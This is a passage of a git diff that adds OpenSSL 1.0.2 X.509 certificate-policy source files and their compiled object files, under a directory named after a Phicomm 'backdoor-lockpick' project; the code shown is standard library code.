+    ext_any = X509_get_ext_d2i(x, NID_inhibit_any_policy, &i, NULL);
+
+    if (!ext_any) {
+        if (i != -1)
+            goto bad_cache;
+    } else if (!policy_cache_set_int(&cache->any_skip, ext_any))
+        goto bad_cache;
+
+    if (0) {
+ bad_cache:
+        x->ex_flags |= EXFLAG_INVALID_POLICY;
+    }
+
+    if (ext_pcons)
+        POLICY_CONSTRAINTS_free(ext_pcons);
+
+    if (ext_any)
+        ASN1_INTEGER_free(ext_any);
+
+    return 1;
+
+}
+
+void policy_cache_free(X509_POLICY_CACHE *cache)
+{
+    if (!cache)
+        return;
+    if (cache->anyPolicy)
+        policy_data_free(cache->anyPolicy);
+    if (cache->data)
+        sk_X509_POLICY_DATA_pop_free(cache->data, policy_data_free);
+    OPENSSL_free(cache);
+}
+
+const X509_POLICY_CACHE *policy_cache_set(X509 *x)
+{
+
+    if (x->policy_cache == NULL) {
+        CRYPTO_w_lock(CRYPTO_LOCK_X509);
+        policy_cache_new(x);
+        CRYPTO_w_unlock(CRYPTO_LOCK_X509);
+    }
+
+    return x->policy_cache;
+
+}
+
+X509_POLICY_DATA *policy_cache_find_data(const X509_POLICY_CACHE *cache,
+                                         const ASN1_OBJECT *id)
+{
+    int idx;
+    X509_POLICY_DATA tmp;
+    tmp.valid_policy = (ASN1_OBJECT *)id;
+    idx = sk_X509_POLICY_DATA_find(cache->data, &tmp);
+    if (idx == -1)
+        return NULL;
+    return sk_X509_POLICY_DATA_value(cache->data, idx);
+}
+
+static int policy_data_cmp(const X509_POLICY_DATA *const *a,
+                           const X509_POLICY_DATA *const *b)
+{
+    return OBJ_cmp((*a)->valid_policy, (*b)->valid_policy);
+}
+
+static int policy_cache_set_int(long *out, ASN1_INTEGER *value)
+{
+    if (value == NULL)
+        return 1;
+    if (value->type == V_ASN1_NEG_INTEGER)
+        return 0;
+    *out = ASN1_INTEGER_get(value);
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/pcy_cache.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/pcy_cache.o
new file mode 100644
index 0000000000000000000000000000000000000000..3bce4fc68a71e3ad6c646a3646fa72cd4ff7ba0d
GIT binary patch
literal 4640
zcmbuDTWnNC7=WkULKi8gD^{#>aUlz-m#(`7l#+nETiVXT(vn_O<Z@WHOIvAom-ZZ8
zu9Yk$IUcHLjGCy4PljlG&=<i6ta2$ls8JFVpYVYwWkI4Q#t5?h|C||^J>8QS{gXK}
z^UeSNGxN`7Cp*#{Ybh@)BSOl^YI3J0C?W4Dcgi7F3=xIQBEMHJ_=}p;shM$8vyz%w
z_awG5JX+8m>!!xv)O?acdD>-cq2_)!)~cwv9P1V|u5V#>r_eC`boi-ocety&lNvW@
z?rL2RH7gd^p|P>XR~sCsxsfcX9{sMIkP}w`pLD_J^BJfxb}xJ_r=R7JGP5zct21<T
zy!y}{Fs2izOoHc6z6x`u#zi_2awCD<QviXymgioU8%<d{w#HXOjW4ND;bVi38mGad
zJ}bA+S5v4Sy$P=JYpJ;cW~o=vT-HtWxsyKuJvdTP4q5e~AK=SOsnJ{;HTU^gMCROX
zKOwbysafNL5pKj`85envI0xOsdwdDhCqICX2_uUc*JI{z76MhpbaAd9q3zhJ4Yvvf
zZr=huLc{COFtNtxhKztAYixx2{$5k_xdk!1d{x0es4>BfC%{(QjBCxnsw)smeP%Sb
zn&^+OH&*9;QS$&8-(szWaebj&$8H;8tOe*MZytvd$<L+-*HPjoBzLYbIS&vlv9&v3
z2rv_?ADEpx_h*?l58cVTCpysrwru)t(5@+*s~&wD>KM6`c^F*qyoek%&SK<zEOL4m
zkL^|53&pXW4};<aU5<{AT*xoBtQO?;gITtc+8hxSSV+(M(M$U5{QTzNH8C9^8U*5J
z7Krtu*RWy*`NUNipS5l8!jVebmO{8|d+5>{YsZ^SS#2SAa7q6pe<o%Wib68^Ei5a|
zovz!oCA>MjCA>APvQxwlPk@>u?xF)!2hlY&pNEdY8Z*zv+2DBYRzaIV&Ak@ELBO%&
zgAhkIcRH}?R3@=oO~ey@Nq>Tn)~2SF-n#DXdP>v1jsB(nKz;BDomGPe8Up^nvWF}T
zlVnl>Uk{{dkXqZi2}FJz8J=L28Y?4Zdpby2)>AgOs?vQFb_CkY<8AlxycY5RFE?Vo
zR`DDz??0=+ZlF+&@wOIp-lBM3DUT?%FS{a&cdR0!)E$`?Rsx5ohm{q%%2s8YYl%x)
z0VJ%{fd*(s6i)<Q5ig{-Afar=PqX65mA5LP@;1d2W-3Ta3hwU;@@t_~qpRdii?I;V
zD7JEeC%eo7P%ilqu|Yi-i?ZDUdF52d^l`RR#YOOHEtdJLimNzPTx9wbxCjWYp<Px0
zD8)m-XT!Y2eAxN|>u}JAy;#yu+JWx{j{Y}5j>7f`<VPTt8V|02DgM3#|I~q>bKu`N
z@b4Y?MF)P}f!}c8E`GM4xkzR@@VO3rnFEhG@U0F!4IJ0y4SodJdBc&(*G?uq&=0pz
zPh5+uiNOr<$C?5}ZH=`@!ZEeIrKPjEOYI6rV$CXPkE~@X+=N|R>W-mglE_XN7~ZL7
z(iy9<sbk}YuJ$5D%XB!Y5#BhEPV5xr!T11F$ur9XjcRXFQ<GUu?P=&I;m)?88g1)p
zZf)+s1_GU=^g)&-U%>47_<&wKm=rYNu+!V0Ye@C?pwf>16w5REa39&w9*Z_@jJCBn
zj87emXEOb%UaqJ%wYPP4b%bFQoz{ek2F0eXs>515u~SX-L0|Fy0TCP?F6f;F8<wG-
z?-IO;sv+IPXA#IM&L6h%2<PJ77y7Sp4);I7UqHd%l=SbB_%Y7y`uMa#LI3#MA^eC7
z7dbu&1z!pK3kCTcNP<7>z;{Vp_Vcd9@s1LHK9)HCJ_-J{#AW>-C4Rr8|BJ*Qka$7j
zb0t0>0|SEd!rw{JZ@t9v&K7(V=eS-AB;G6O<9#Re_e%Qmy1(e4|DnX?xP9foFG~DD
zsb3er2kh&$MB-jaf2qV5N<7Lrb|de%Hc4OJZ@m&<B>CARaXAiONL-Hp1&Pb+ds*VL
ze;fk}&KG~%Mf}$x1VMf`B*DE<M!|Vu60(dJ1jjvxB7W}#7xj0n=G%V6{Y(7Ay9c%S
zcF46MEAJDfq2xf^ufbJE{CE`;|MuZw;vY(51=WN8An_;CgM-NwsHD<b(hpC*dUn<D
zdT&biXNJ<5<dC)-OwnPo4{oXWV3H5$e`a2=$0K8Zk%WMu{KnV8s#&_Cj5(e$jClx>
zECJj^AV<0VOekYN;su3gA7u$7<hE`|13E1ss4L5(P(h#n)jkNe=(7QmETaD^8A4g~
zFY*v)0h``xKK@5+T-b>`%I$4xr2k*ee<K*;YgOLc=qtnRy;zY%#9yFYP{6U+?T>Q%
z<3f?=cKZR~s2bw!A{)oU39^lS3BmQpSF*4d>tCvGG@<<Iyp1m`t^+2!J^Hk-Js@(7
bD;^esMhIf7vb&;`y_f%=gYRHj?DqcvZt91a

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/pcy_data.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/pcy_data.c
new file mode 100644
index 0000000..90e9970
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/pcy_data.c
@@ -0,0 +1,129 @@
+/* pcy_data.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2004.
+ */
+/* ====================================================================
+ * Copyright (c) 2004 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "cryptlib.h"
+#include <openssl/x509.h>
+#include <openssl/x509v3.h>
+
+#include "pcy_int.h"
+
+/* Policy Node routines */
+
+void policy_data_free(X509_POLICY_DATA *data)
+{
+    ASN1_OBJECT_free(data->valid_policy);
+    /* Don't free qualifiers if shared */
+    if (!(data->flags & POLICY_DATA_FLAG_SHARED_QUALIFIERS))
+        sk_POLICYQUALINFO_pop_free(data->qualifier_set, POLICYQUALINFO_free);
+    sk_ASN1_OBJECT_pop_free(data->expected_policy_set, ASN1_OBJECT_free);
+    OPENSSL_free(data);
+}
+
+/*
+ * Create a data based on an existing policy. If 'id' is NULL use the oid in
+ * the policy, otherwise use 'id'. This behaviour covers the two types of
+ * data in RFC3280: data with from a CertificatePolcies extension and
+ * additional data with just the qualifiers of anyPolicy and ID from another
+ * source.
+ */
+
+X509_POLICY_DATA *policy_data_new(POLICYINFO *policy,
+                                  const ASN1_OBJECT *cid, int crit)
+{
+    X509_POLICY_DATA *ret;
+    ASN1_OBJECT *id;
+    if (!policy && !cid)
+        return NULL;
+    if (cid) {
+        id = OBJ_dup(cid);
+        if (!id)
+            return NULL;
+    } else
+        id = NULL;
+    ret = OPENSSL_malloc(sizeof(X509_POLICY_DATA));
+    if (!ret)
+        return NULL;
+    ret->expected_policy_set = sk_ASN1_OBJECT_new_null();
+    if (!ret->expected_policy_set) {
+        OPENSSL_free(ret);
+        if (id)
+            ASN1_OBJECT_free(id);
+        return NULL;
+    }
+
+    if (crit)
+        ret->flags = POLICY_DATA_FLAG_CRITICAL;
+    else
+        ret->flags = 0;
+
+    if (id)
+        ret->valid_policy = id;
+    else {
+        ret->valid_policy = policy->policyid;
+        policy->policyid = NULL;
+    }
+
+    if (policy) {
+        ret->qualifier_set = policy->qualifiers;
+        policy->qualifiers = NULL;
+    } else
+        ret->qualifier_set = NULL;
+
+    return ret;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/pcy_data.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/pcy_data.o
new file mode 100644
index 0000000000000000000000000000000000000000..dbae0266c8a20e7ff901e0d129048fc099a62434
GIT binary patch
literal 2568
zcmbW2O>7%Q6o8+9N*xil+rq(6RIN&c!cSLr3*tuz?b>lNhE?1)_8~yDIPOBL`VV^-
z8W8jlTy+&9_0Ek8+&FMST!>UqZdETxNL+eA0u-TARkRgQmG@?6+R0{p>62#Pd*8hG
zW_D(F_H4zOO{Y>IB?Yg-Jx@}A^AFs!EpA$%!9#F;&w+m$EWFLu&gOn6exm}}Kxb<o
zV|$(er|9Rm`Qg>2Kd6`TS$NBCu!+CydSl_3|27N%W#Qj;_!Ar5@O2j6j4FgbveAZL
z`mTjpY@L_>-awo8R>L2tcS<-jQ+afQ$DHuDD0%d!pJU-w?o^7uZoO`=-cCKbar5%(
z72OWAQw#$pt6_U8$40*dd$$g<wM;dfL3cBQV*pz#=g8ODW;sV-YofY|E}3sQ;gvU+
z?6>Tti~ZJ$d!p$#O`POhx%{#*-B=E~eqg+09x)4tiZ2A*Eq-#iU>2TxD#BC)ve>BF
zE^Kr24M+oQ5aXkxegqpy>ciuZI-{rdPwviLz>Ufydz|+GSfneOelGpKMw5I|G{TqY
zQPuSIbVbX5ma#SCT-Mg6S9jT3A^nXuJ);@6mM>{~iKkL@qR`pM!nHd|oteawL+>Ep
zVtZDGzx8%TUWTti65qWO@_4=_JNhy(v4c%=LaV$}GN2rC(Y+V-KIOeE!4IP5yDxmH
zXw8#&bqrq`!%vOj0dks;g_?x#E9w!pq;c2B@XyC^P>!(alnc=BwNHst?Y=YcJaFfn
zTFG|Y+U)E?rS8`4l2dWPUYIYswbE;qay<$=T63!9#bXWIsm{;VA~rnj_Iv%vE+1b!
zS{Ga$qw9SDSjRmP^g+aQn(cP41(=PUZZ~MR0dJm2=o=yXzdMl}5d3M>n!=wDoZ|N=
z+!UPR)jCH6kH>oo--oswcSUggZuzN`d{v2mSc$)&aQe1o{1*zR{gnJ`g{$*?Md50^
zAvn#4niLr?xg|Ty;Y!DEE`vGr2a!H0t%28Wn!b0&2a_&0FqelzFb6$;(_v82EP~nU
zbvj-bL%KcRGw}*LH1wOT)53qZ8<_n;ukQ`~6-=dq-bp+N&5m49Igk6)2IkS-6#s%P
zWF%VbrxtTzKgQ5rTi8_jmLQ5D5*|dGOnKwb{Y&yBHsbM{ZazK`1*63Av&g9C{pJ@%
z&BLfwk>k_6RgvRMZDA+b1vLomMG^2!jLST!>3);88v1DxOo&}XMz_0qR;kW;k#CTr
zh+Kb(-a~^z<N05S{JsnnI-ZYLO5*<iEPfSoU1%NYuOjp1{wIx1L*>PUZi#u&|A%VC
k^QmTh?-7A6&fk~hC?d+;CG?+4%Fl@p;-kBfkrB`TAHC94vH$=8

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/pcy_int.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/pcy_int.h
new file mode 100644
index 0000000..b5075f9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/pcy_int.h
@@ -0,0 +1,217 @@
+/* pcy_int.h */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2004.
+ */
+/* ====================================================================
+ * Copyright (c) 2004 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+typedef struct X509_POLICY_DATA_st X509_POLICY_DATA;
+
+DECLARE_STACK_OF(X509_POLICY_DATA)
+
+/* Internal structures */
+
+/*
+ * This structure and the field names correspond to the Policy 'node' of
+ * RFC3280. NB this structure contains no pointers to parent or child data:
+ * X509_POLICY_NODE contains that. This means that the main policy data can
+ * be kept static and cached with the certificate.
+ */
+
+struct X509_POLICY_DATA_st {
+    unsigned int flags;
+    /* Policy OID and qualifiers for this data */
+    ASN1_OBJECT *valid_policy;
+    STACK_OF(POLICYQUALINFO) *qualifier_set;
+    STACK_OF(ASN1_OBJECT) *expected_policy_set;
+};
+
+/* X509_POLICY_DATA flags values */
+
+/*
+ * This flag indicates the structure has been mapped using a policy mapping
+ * extension. If policy mapping is not active its references get deleted.
+ */
+
+#define POLICY_DATA_FLAG_MAPPED                 0x1
+
+/*
+ * This flag indicates the data doesn't correspond to a policy in Certificate
+ * Policies: it has been mapped to any policy.
+ */
+
+#define POLICY_DATA_FLAG_MAPPED_ANY             0x2
+
+/* AND with flags to see if any mapping has occurred */
+
+#define POLICY_DATA_FLAG_MAP_MASK               0x3
+
+/* qualifiers are shared and shouldn't be freed */
+
+#define POLICY_DATA_FLAG_SHARED_QUALIFIERS      0x4
+
+/* Parent node is an extra node and should be freed */
+
+#define POLICY_DATA_FLAG_EXTRA_NODE             0x8
+
+/* Corresponding CertificatePolicies is critical */
+
+#define POLICY_DATA_FLAG_CRITICAL               0x10
+
+/* This structure is cached with a certificate */
+
+struct X509_POLICY_CACHE_st {
+    /* anyPolicy data or NULL if no anyPolicy */
+    X509_POLICY_DATA *anyPolicy;
+    /* other policy data */
+    STACK_OF(X509_POLICY_DATA) *data;
+    /* If InhibitAnyPolicy present this is its value or -1 if absent. */
+    long any_skip;
+    /*
+     * If policyConstraints and requireExplicitPolicy present this is its
+     * value or -1 if absent.
+     */
+    long explicit_skip;
+    /*
+     * If policyConstraints and policyMapping present this is its value or -1
+     * if absent.
+     */
+    long map_skip;
+};
+
+/*
+ * #define POLICY_CACHE_FLAG_CRITICAL POLICY_DATA_FLAG_CRITICAL
+ */
+
+/* This structure represents the relationship between nodes */
+
+struct X509_POLICY_NODE_st {
+    /* node data this refers to */
+    const X509_POLICY_DATA *data;
+    /* Parent node */
+    X509_POLICY_NODE *parent;
+    /* Number of child nodes */
+    int nchild;
+};
+
+struct X509_POLICY_LEVEL_st {
+    /* Cert for this level */
+    X509 *cert;
+    /* nodes at this level */
+    STACK_OF(X509_POLICY_NODE) *nodes;
+    /* anyPolicy node */
+    X509_POLICY_NODE *anyPolicy;
+    /* Extra data */
+    /*
+     * STACK_OF(X509_POLICY_DATA) *extra_data;
+     */
+    unsigned int flags;
+};
+
+struct X509_POLICY_TREE_st {
+    /* This is the tree 'level' data */
+    X509_POLICY_LEVEL *levels;
+    int nlevel;
+    /*
+     * Extra policy data when additional nodes (not from the certificate) are
+     * required.
+     */
+    STACK_OF(X509_POLICY_DATA) *extra_data;
+    /* This is the authority constained policy set */
+    STACK_OF(X509_POLICY_NODE) *auth_policies;
+    STACK_OF(X509_POLICY_NODE) *user_policies;
+    unsigned int flags;
+};
+
+/* Set if anyPolicy present in user policies */
+#define POLICY_FLAG_ANY_POLICY          0x2
+
+/* Useful macros */
+
+#define node_data_critical(data) (data->flags & POLICY_DATA_FLAG_CRITICAL)
+#define node_critical(node) node_data_critical(node->data)
+
+/* Internal functions */
+
+X509_POLICY_DATA *policy_data_new(POLICYINFO *policy, const ASN1_OBJECT *id,
+                                  int crit);
+void policy_data_free(X509_POLICY_DATA *data);
+
+X509_POLICY_DATA *policy_cache_find_data(const X509_POLICY_CACHE *cache,
+                                         const ASN1_OBJECT *id);
+int policy_cache_set_mapping(X509 *x, POLICY_MAPPINGS *maps);
+
+STACK_OF(X509_POLICY_NODE) *policy_node_cmp_new(void);
+
+void policy_cache_init(void);
+
+void policy_cache_free(X509_POLICY_CACHE *cache);
+
+X509_POLICY_NODE *level_find_node(const X509_POLICY_LEVEL *level,
+                                  const X509_POLICY_NODE *parent,
+                                  const ASN1_OBJECT *id);
+
+X509_POLICY_NODE *tree_find_sk(STACK_OF(X509_POLICY_NODE) *sk,
+                               const ASN1_OBJECT *id);
+
+X509_POLICY_NODE *level_add_node(X509_POLICY_LEVEL *level,
+                                 const X509_POLICY_DATA *data,
+                                 X509_POLICY_NODE *parent,
+                                 X509_POLICY_TREE *tree);
+void policy_node_free(X509_POLICY_NODE *node);
+int policy_node_match(const X509_POLICY_LEVEL *lvl,
+                      const X509_POLICY_NODE *node, const ASN1_OBJECT *oid);
+
+const X509_POLICY_CACHE *policy_cache_set(X509 *x);
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/pcy_lib.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/pcy_lib.c
new file mode 100644
index 0000000..dbb2983
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/pcy_lib.c
@@ -0,0 +1,167 @@
+/* pcy_lib.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2004.
+ */
+/* ====================================================================
+ * Copyright (c) 2004 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "cryptlib.h"
+#include <openssl/x509.h>
+#include <openssl/x509v3.h>
+
+#include "pcy_int.h"
+
+/* accessor functions */
+
+/* X509_POLICY_TREE stuff */
+
+int X509_policy_tree_level_count(const X509_POLICY_TREE *tree)
+{
+    if (!tree)
+        return 0;
+    return tree->nlevel;
+}
+
+X509_POLICY_LEVEL *X509_policy_tree_get0_level(const X509_POLICY_TREE *tree,
+                                               int i)
+{
+    if (!tree || (i < 0) || (i >= tree->nlevel))
+        return NULL;
+    return tree->levels + i;
+}
+
+STACK_OF(X509_POLICY_NODE) *X509_policy_tree_get0_policies(const
+                                                           X509_POLICY_TREE
+                                                           *tree)
+{
+    if (!tree)
+        return NULL;
+    return tree->auth_policies;
+}
+
+STACK_OF(X509_POLICY_NODE) *X509_policy_tree_get0_user_policies(const
+                                                                X509_POLICY_TREE
+                                                                *tree)
+{
+    if (!tree)
+        return NULL;
+    if (tree->flags & POLICY_FLAG_ANY_POLICY)
+        return tree->auth_policies;
+    else
+        return tree->user_policies;
+}
+
+/* X509_POLICY_LEVEL stuff */
+
+int X509_policy_level_node_count(X509_POLICY_LEVEL *level)
+{
+    int n;
+    if (!level)
+        return 0;
+    if (level->anyPolicy)
+        n = 1;
+    else
+        n = 0;
+    if (level->nodes)
+        n += sk_X509_POLICY_NODE_num(level->nodes);
+    return n;
+}
+
+X509_POLICY_NODE *X509_policy_level_get0_node(X509_POLICY_LEVEL *level, int i)
+{
+    if (!level)
+        return NULL;
+    if (level->anyPolicy) {
+        if (i == 0)
+            return level->anyPolicy;
+        i--;
+    }
+    return sk_X509_POLICY_NODE_value(level->nodes, i);
+}
+
+/* X509_POLICY_NODE stuff */
+
+const ASN1_OBJECT *X509_policy_node_get0_policy(const X509_POLICY_NODE *node)
+{
+    if (!node)
+        return NULL;
+    return node->data->valid_policy;
+}
+
+#if 0
+int X509_policy_node_get_critical(const X509_POLICY_NODE *node)
+{
+    if (node_critical(node))
+        return 1;
+    return 0;
+}
+#endif
+
+STACK_OF(POLICYQUALINFO) *X509_policy_node_get0_qualifiers(const
+                                                           X509_POLICY_NODE
+                                                           *node)
+{
+    if (!node)
+        return NULL;
+    return node->data->qualifier_set;
+}
+
+const X509_POLICY_NODE *X509_policy_node_get0_parent(const X509_POLICY_NODE
+                                                     *node)
+{
+    if (!node)
+        return NULL;
+    return node->parent;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/pcy_lib.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/pcy_lib.o
new file mode 100644
index 0000000000000000000000000000000000000000..623833244a8b88b39749780fc1d88566dd9c1425
GIT binary patch
literal 2632
zcmbuBO=uHQ5P;uyTeJSP@dqsULqL&=c1dbQ+Jhw4B#RUkZJ~$CvWc%Xnm;$2+InaY
zQdHuh7r}!E4_*Zio;*d`gD1}(6g-INK~RKJM5r^nGj_AxTy$VF^S(Fp=IxuwOBT|j
znGQt}EQ&ZIHbzW^&>|al(lwJ}r`REW_8j_^Xc~*_j@rm-%NxUei>tGHhHh)~-9{r~
z<X4T?pSuj@`?Bj|JXph!PNR|S^@E<(Y+r}d<zo1VxpS$pbm9}bA4Gk3Au5c<f|lxe
zw1QCkg1bp6E9V}3Oig-=0q%wHsIk~|wk)nXJJ;W0$XE1CH2n!9xVc8s+c@otSk&)_
zJJps&c4TBY);FH3mz{cSNI$8^`xB?@?l3Vw5ZB{_$2=@LAypKfE_kvR#zlt^O=K!O
zD0@96lslJ&G8<L)?}%tiaPSy&faZEgBa4%L*vHP1z01cY$mTVAVO%7ZK%ME1KJ2*B
zt$~T_-bV&<#8WPNLN@Oa{ayqZ&aDvR{4@+z*i)V2$9mYL8rpGqR(x8mQL1~otqe!1
z*s>YA+}FH54^`kPY!=n6S}WfU!`;4pa&7vE^O);{wL$*@T87UkPke+p*XbT{lek+e
zu%E$$=O2_;0K)id;Fx!b0=TXp+W3Da|Ci*?HCLfvxXzmZKSKOHaegmR&Ci*|LQc<%
